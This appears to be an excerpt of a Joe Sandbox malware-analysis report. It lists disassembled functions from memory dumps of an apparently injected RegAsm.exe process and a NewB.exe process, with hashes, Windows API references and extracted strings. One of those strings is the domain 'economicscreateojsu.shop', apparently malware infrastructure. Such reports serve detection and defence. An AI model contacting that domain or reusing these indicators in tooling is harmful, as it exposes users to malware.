Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 789:
API String ID: 0-2924019492
Opcode ID: 91002e8592419f02679266217e0656b05884a03e323483f8f31014a3a2b85d26
Instruction ID: 75855608be2bda6d97df851f8e3a2661acfeea8d70f422b91aa9a116a9652a2c
Opcode Fuzzy Hash: 91002e8592419f02679266217e0656b05884a03e323483f8f31014a3a2b85d26
Instruction Fuzzy Hash: 442162752107419BD725CF24C881BA7B3B2FF81305F284A1EE596A7785D7B9F841CB48

Uniqueness

Uniqueness Score: -1.00%

Function 0041347E Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

789:, xrefs: 004134C0

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 789:
API String ID: 0-2924019492
Opcode ID: 6632e86e90320e603a285031c02ad9be3a03face611ce7db98c36edb2b210904
Instruction ID: 695dfa75bfd7b84a09a8389b6cc6ea945b72dffd246397d7a94960ee23ad2b5b
Opcode Fuzzy Hash: 6632e86e90320e603a285031c02ad9be3a03face611ce7db98c36edb2b210904
Instruction Fuzzy Hash: 3C21A134640B029BD7348F28C890BA7B7F2BB45315F14492CD2A787B92E379F8419B48

Uniqueness

Uniqueness Score: -1.00%

Function 00422B70 Relevance: 1.3, Strings: 1, Instructions: 53COMMON

Download Yara Rule

Strings

h3E, xrefs: 00422BC3

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: h3E
API String ID: 0-1264096165
Opcode ID: 3f696112414c2176a47e66b299e801a383e415b346e735ebcf3c7c746a3e6efe
Instruction ID: 3c3bb655185b5af2888637fc8bac67708ee984c1cf6fe0d356e12da658f3a700
Opcode Fuzzy Hash: 3f696112414c2176a47e66b299e801a383e415b346e735ebcf3c7c746a3e6efe
Instruction Fuzzy Hash: 79F0C82020CBD19EC716CF299150676FFE0AF97605F1454CDD4D197362C21CD90ACB2A

Uniqueness

Uniqueness Score: -1.00%

Function 00422B54 Relevance: 1.3, Strings: 1, Instructions: 27COMMON

Download Yara Rule

Strings

h3E, xrefs: 00422BC3

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: h3E
API String ID: 0-1264096165
Opcode ID: d95b8c7dad6f27eaeeba518d165f6ea783b51c0a4d661dd6bbb858999750f331
Instruction ID: 364beef6f316d3f83652dd8aa71acb0ec1cc879e8a2107f1598c1c26b9198e98
Opcode Fuzzy Hash: d95b8c7dad6f27eaeeba518d165f6ea783b51c0a4d661dd6bbb858999750f331
Instruction Fuzzy Hash: B9E0223020C7908EC309CF28E110236FBE1AF9B600F2454DED4C2D73A2C228DA07CA1A

Uniqueness

Uniqueness Score: -1.00%

Function 0041403B Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

:^F, xrefs: 00414061

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: :^F
API String ID: 0-1832529195
Opcode ID: f8a9e0cc216a639e61236eec9da2288ad57904349f70ab7f3e7e58259bc75aec
Instruction ID: 7f238519bb71acc741d5806136ffcdbde4ed3e01776cef76c6de01323dd1d1f1
Opcode Fuzzy Hash: f8a9e0cc216a639e61236eec9da2288ad57904349f70ab7f3e7e58259bc75aec
Instruction Fuzzy Hash: 4BE01A5594F3C05FD7079B306C668A67F3A4BC7204B0E40EBD589CB2A3C4384A2DD36A

Uniqueness

Uniqueness Score: -1.00%

Function 00417BF5 Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e75c200018e59baf3db3a4633f6a5c56dcb5211695afe82e4da1f028e4cf7af2
Instruction ID: 7bf09f208c8d42f402782dd01e8dcfad3d0292ea5e19e587d8160202315e0386
Opcode Fuzzy Hash: e75c200018e59baf3db3a4633f6a5c56dcb5211695afe82e4da1f028e4cf7af2
Instruction Fuzzy Hash: A8B18BB1504B018BD725CF24C4A1BA3B7F2FF85314F148A0ED8A64BB91D779B986CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00410F4D Relevance: .2, Instructions: 249COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bc2e0e55a338f513035b448ae768bf0c073bdb2ae9d872481aa33d02647a887
Instruction ID: b397bc2b545a3e06a06c6f9a7b35e90c89a8d5b58e071fd8aed5b45881f06650
Opcode Fuzzy Hash: 9bc2e0e55a338f513035b448ae768bf0c073bdb2ae9d872481aa33d02647a887
Instruction Fuzzy Hash: D1818FB0500B008FD735CF25C4947A7B7E6AF89314F14892ED1AB87791E77AB889CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00416A62 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e287f75f01b1090a8810b6704e520a747e4386ccfcc2396787102a6952bd403
Instruction ID: d15a5ba77c2942aaed52dfcd08f948692d97a9139cdbd11b09d40d24ee078bc7
Opcode Fuzzy Hash: 9e287f75f01b1090a8810b6704e520a747e4386ccfcc2396787102a6952bd403
Instruction Fuzzy Hash: 1B61BD701083528BCB14CF14C861AABB3B1FFD6318F415A1CF8A65B2D1D735D845CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00415216 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39d4da0960ba4646421de97c71f1a7cbe10ec081e1e5c6ba075d117473ca0819
Instruction ID: 545b315d56c03b522b5d99d20036039b40e7180db63e96aaac84a40b3ebbbfbc
Opcode Fuzzy Hash: 39d4da0960ba4646421de97c71f1a7cbe10ec081e1e5c6ba075d117473ca0819
Instruction Fuzzy Hash: C731B272610A10CFC724CF14C892AB373B1FFAA354719416AD956CB3A0E739F851CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0043822F Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 584657ef151b8187a3a4750398981d09528dca47d4deaaf1de6ca309e7dd6aca
Instruction ID: f1f54ffedb807780357bd696c1c2a9751d85aa1e3442850fd13f11c07331e65e
Opcode Fuzzy Hash: 584657ef151b8187a3a4750398981d09528dca47d4deaaf1de6ca309e7dd6aca
Instruction Fuzzy Hash: CB3115746083419BE718CF04C5A472BB7E2BBCA709F25995DE8C607791C739EC09DB8A

Uniqueness

Uniqueness Score: -1.00%

Function 004025E0 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0bfbfb61dbf5779cf225968f8c5217ee72eb12cd5ca65c21218be2dfbc2d940
Instruction ID: 07de276a0e9e5309fcf8d398c85ee914db3ade285566f83fb5552bca2ba40eb8
Opcode Fuzzy Hash: f0bfbfb61dbf5779cf225968f8c5217ee72eb12cd5ca65c21218be2dfbc2d940
Instruction Fuzzy Hash: D231D8306046009BC7149E19CA88927B7E1EF85318F184D7EE8D9A73D1D67ADD53CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 00432140 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: d2de3db70371d7fa33c8edf06fd931e09d60dc9d2bbf6fa126cafacc00fd25b9
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: BB114C33A051E40EC7168D3C8A00565BFA31AD7234F1D539AF4B49B2D2D6278D8B8369

Uniqueness

Uniqueness Score: -1.00%

Function 0043799B Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e85327cca07778d5fa5c6387c8ed6258d52b71aa4bff88396f83fddc4650c8f7
Instruction ID: 7589fa0b55ddb035dc5953139a33f16b58e0856eb98253357792a4a2099d3379
Opcode Fuzzy Hash: e85327cca07778d5fa5c6387c8ed6258d52b71aa4bff88396f83fddc4650c8f7
Instruction Fuzzy Hash: 7511E2B04193418BD718DF14C0A066BBBF1EF8A344F545E0EE8E29B240D339D6069B5A

Uniqueness

Uniqueness Score: -1.00%

Function 0043A0D9 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 423d67a1aedaa4b508aa77c2bc40276057c224fc83bd2c24f4d8f53ec03e9d94
Instruction ID: 5fc0ae8dc96022c44960700c7ab2adaf62af461dc2bf8e2718f495d239de32d0
Opcode Fuzzy Hash: 423d67a1aedaa4b508aa77c2bc40276057c224fc83bd2c24f4d8f53ec03e9d94
Instruction Fuzzy Hash: 2EF06735A083019BC708CF19C09062BFBF0AF8A750F28986EA4D9D3351DB30ED558B46

Uniqueness

Uniqueness Score: -1.00%

Function 0040D2C0 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 699039870cb33442d1a4fa21481bbe1e7a2f0d085c6e2806cd73b173b10ae215
Instruction ID: b4944c70536aa93040e23a0d3de02e03ae6e0bd8259874742134aa93b1285e44
Opcode Fuzzy Hash: 699039870cb33442d1a4fa21481bbe1e7a2f0d085c6e2806cd73b173b10ae215
Instruction Fuzzy Hash: A7E0C266B057610BA718CDB548A01B7F7E55A87322F1CA4BED492E3244C13CC805425C

Uniqueness

Uniqueness Score: -1.00%

Function 0040FED9 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eae7d2772a78467c0d93536fe5619a14daad1bcc9832cc0b3c97cf4b1fb97af8
Instruction ID: 832b43b70c8be9becace1e9a524aaac1633fa4a646e66cb56c40eb57a0982910
Opcode Fuzzy Hash: eae7d2772a78467c0d93536fe5619a14daad1bcc9832cc0b3c97cf4b1fb97af8
Instruction Fuzzy Hash: CAC04C249440015A81199B15DDE5879B3796687945740743CD90BD3260DB14E409991D

Uniqueness

Uniqueness Score: -1.00%

Function 00416582 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3f1035c1401d21b34ad4db02c73ed8df596dac4499ff47489de15c59aee4e8d
Instruction ID: 8b35dc4ed4a9966cb47b13b221a0358a275917a8b9a254330dbaa609285bd0fa
Opcode Fuzzy Hash: f3f1035c1401d21b34ad4db02c73ed8df596dac4499ff47489de15c59aee4e8d
Instruction Fuzzy Hash: 72C04C3CBAD240978348CF00D990875F77AE78B212B19B12DEC5513325D534E886850C

Uniqueness

Uniqueness Score: -1.00%

Function 00439461 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80402a54a2eb80e0272eadae08c2f832bf20fb6b3d132a6f8ec30e6a10445a34
Instruction ID: b9894db37ae32ee18a48b4ed2c803f881acc9e4ff8f0547e5b61e8919c04ec24
Opcode Fuzzy Hash: 80402a54a2eb80e0272eadae08c2f832bf20fb6b3d132a6f8ec30e6a10445a34
Instruction Fuzzy Hash: DBB002B8E58305AF8704DE25D480826F7F0AB5A260F11B859A495E7221D235D840CE59

Uniqueness

Uniqueness Score: -1.00%

Function 0040DBF0 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 403COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32 ref: 0040DE17
ExitProcess.KERNEL32 ref: 0040DE26
ExitProcess.KERNEL32 ref: 0040DE35
ExitProcess.KERNEL32 ref: 0040DE44

Strings

economicscreateojsu.shop, xrefs: 0040E11C
8C, xrefs: 0040DC75

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID: ExitProcess
String ID: 8C$economicscreateojsu.shop
API String ID: 621844428-368804650
Opcode ID: 9d069546454374d22e256a09b0b822224c2e5367ee5760069ea63c1c01d69791
Instruction ID: c3754cf6d4af3efd44086515a8e4feea577dce0be4ef3330c692d516742b2779
Opcode Fuzzy Hash: 9d069546454374d22e256a09b0b822224c2e5367ee5760069ea63c1c01d69791
Instruction Fuzzy Hash: A8222860008BC1CED726CF388498716BFA16B26224F1987DDD8E64F7E7C3759509CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00422FF0 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 266COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 004230D8
RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 0042310F

Strings

Uv, xrefs: 004231C2
I~, xrefs: 004231C9
e, xrefs: 004231D0

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: I~$Uv$e
API String ID: 237503144-3460210907
Opcode ID: 0c85fb32393b619e4174935f3914e6fbba2023c729609c0d7ab07a37ec999949
Instruction ID: 16cafb33f1f8e4995bd0bdf4f58cd314be70f01e5f7da7e4e22661345279a5c2
Opcode Fuzzy Hash: 0c85fb32393b619e4174935f3914e6fbba2023c729609c0d7ab07a37ec999949
Instruction Fuzzy Hash: A2A11FB4240B108BE724CF26C4A0BA7BBE1BB46314F404E2DD4D78BB91D778B54ACB94

Uniqueness

Uniqueness Score: -1.00%

Function 0041E8A6 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 155COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 0041E9E0
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 0041EA0E

Strings

y~, xrefs: 0041E8FC
FC, xrefs: 0041E903
^t, xrefs: 0041E8F5

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: FC$^t$y~
API String ID: 237503144-1521909807
Opcode ID: 86ab68235d3dcfa5e9dd596c9849b44e68fdef890faf49acc93a02a99978f9f5
Instruction ID: 7dc4180f42710efd34fe1777278b8f8e7ffdb24aa82c73dcb8f70fcf12544316
Opcode Fuzzy Hash: 86ab68235d3dcfa5e9dd596c9849b44e68fdef890faf49acc93a02a99978f9f5
Instruction Fuzzy Hash: 0A5156B41007019FD724CF16C894B52BBB1FF85720F158A9CE8AA4FBA6D774E846CB85

Uniqueness

Uniqueness Score: -1.00%

Function 00433FB0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 71COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000000D,1BC919F5,00000008,?), ref: 00434086

Strings

]U, xrefs: 00433FC4
\O, xrefs: 00433FCC
Y", xrefs: 00433FD4
ZC, xrefs: 00433FDC

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: Y"$ZC$\O$]U
API String ID: 237503144-2272643138
Opcode ID: 47c2b8574a887638884fb7d152d71a54bde3dcda3434452c017fa81227bf6c5e
Instruction ID: dc9efc591604e7eca86abe716767c5bc2ee1dea97722851847302af0a282a4f1
Opcode Fuzzy Hash: 47c2b8574a887638884fb7d152d71a54bde3dcda3434452c017fa81227bf6c5e
Instruction Fuzzy Hash: 3F2145751083809FD314CF18D490B5FBBF4FB8A348F500A1DFAA59B281C7B5E9068B96

Uniqueness

Uniqueness Score: -1.00%

Function 00429E94 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

SysStringLen.OLEAUT32 ref: 00429E9E

Part of subcall function 004359F0: RtlAllocateHeap.NTDLL(?,00000000,00409E11), ref: 00435A87

Strings

7, xrefs: 0042A038
0, xrefs: 0042A028
,, xrefs: 0042A030

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID: AllocateHeapString
String ID: ,$0$7
API String ID: 983180023-2155719752
Opcode ID: 4510eb9d95241b54e0b6a31f35593dc58b689fc8dbc2fb36b150089f0e416690
Instruction ID: c908502eda0842b721617bfb232101f265745d64272503eb8c3c42083bdf6617
Opcode Fuzzy Hash: 4510eb9d95241b54e0b6a31f35593dc58b689fc8dbc2fb36b150089f0e416690
Instruction Fuzzy Hash: 4791D471B097918FC335CE28C4907EBBBD2AB95324F594A2DD8E58B3C1D6398845CB46

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: NewB.exePID: 5448, Parent PID: 1064COMMON

Execution Graph

Execution Coverage:	0.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.2%
Total number of Nodes:	82
Total number of Limit Nodes:	3

Executed Functions

Function 001C661B Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,001C661A,?,?,?,?,?,001C763B), ref: 001C663D
TerminateProcess.KERNEL32(00000000,?,001C661A,?,?,?,?,?,001C763B), ref: 001C6644
ExitProcess.KERNEL32 ref: 001C6656

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 56df79b66b8bc9708d7efd82996383fb4337d6e809305e6a7518d1c90158b866
Instruction ID: e817b217c18ba3959be7bd5d8057fc1f4ab6f0606d676b2b4473605dcfc63a5e
Opcode Fuzzy Hash: 56df79b66b8bc9708d7efd82996383fb4337d6e809305e6a7518d1c90158b866
Instruction Fuzzy Hash: C1E0B631010198ABCB126FA4DC4DE5C3B69EB69755B444418F9099A531CB75DDC2CB84

Uniqueness

Uniqueness Score: -1.00%

Function 001CB10D Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

ext-ms-, xrefs: 001CB178
api-ms-, xrefs: 001CB164

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 09b110f6b4c443e88e1ad34204eb9d11995c1ea4e187fe481d19e381d5428291
Instruction ID: 1be3f8cd8a45b1d08438c3a892e2fa554e2f071ec6ed80000928400c4affadb8
Opcode Fuzzy Hash: 09b110f6b4c443e88e1ad34204eb9d11995c1ea4e187fe481d19e381d5428291
Instruction Fuzzy Hash: 59212B71A09261ABCB2247A4BCD7F2E37589F357A0F29011DED45EB690D770ED4086E0

Uniqueness

Uniqueness Score: -1.00%

Function 0019A0B0 Relevance: 1.7, APIs: 1, Instructions: 154
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0019A0B0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,86BBC188), ref: 00198A9F

Part of subcall function 00198440: GetModuleFileNameA.KERNEL32(00000000,?,00000104,86BBC188,?,00000000), ref: 001984A3

SetCurrentDirectoryA.KERNEL32(00000000,86BBC188,00000000), ref: 0019A0FC

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: FileModuleName$CurrentDirectory
String ID:
API String ID: 1135421992-0
Opcode ID: e35bf92dd5386d24bfac7443f554040c4579292ebbef3afd9cc66ca51e4618c5
Instruction ID: d00f6d473ee3ba71479d5934622d667712982c1a19f3fc809ef17e7fd6cf820a
Opcode Fuzzy Hash: e35bf92dd5386d24bfac7443f554040c4579292ebbef3afd9cc66ca51e4618c5
Instruction Fuzzy Hash: 5751C870D002489BEF14EBA4CD597ADBB72AF52304FA48198D405673C7DB755A88CB93

Uniqueness

Uniqueness Score: -1.00%

Function 001CB1D4 Relevance: 1.6, APIs: 1, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01ec953b5522ddac95e519602a69ac30eecefa5619a89df31eaea85d437aee84
Instruction ID: 86155602dd1b17731853666a7dd8df31873a8d2459315ab96d02dfc5122e44f8
Opcode Fuzzy Hash: 01ec953b5522ddac95e519602a69ac30eecefa5619a89df31eaea85d437aee84
Instruction Fuzzy Hash: 620128337042155F9B1ACE69EC82F5E3396ABE5770B258128FA16CB594DF30E841D790

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 001AC858 Relevance: 143.7, APIs: 41, Strings: 41, Instructions: 167
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 001AC85E
GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 001AC86C
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 001AC87D
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 001AC88E
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 001AC89F
GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 001AC8B0
GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 001AC8C1
GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 001AC8D2
GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 001AC8E3
GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 001AC8F4
GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 001AC905
GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 001AC916
GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 001AC927
GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 001AC938
GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 001AC949
GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 001AC95A
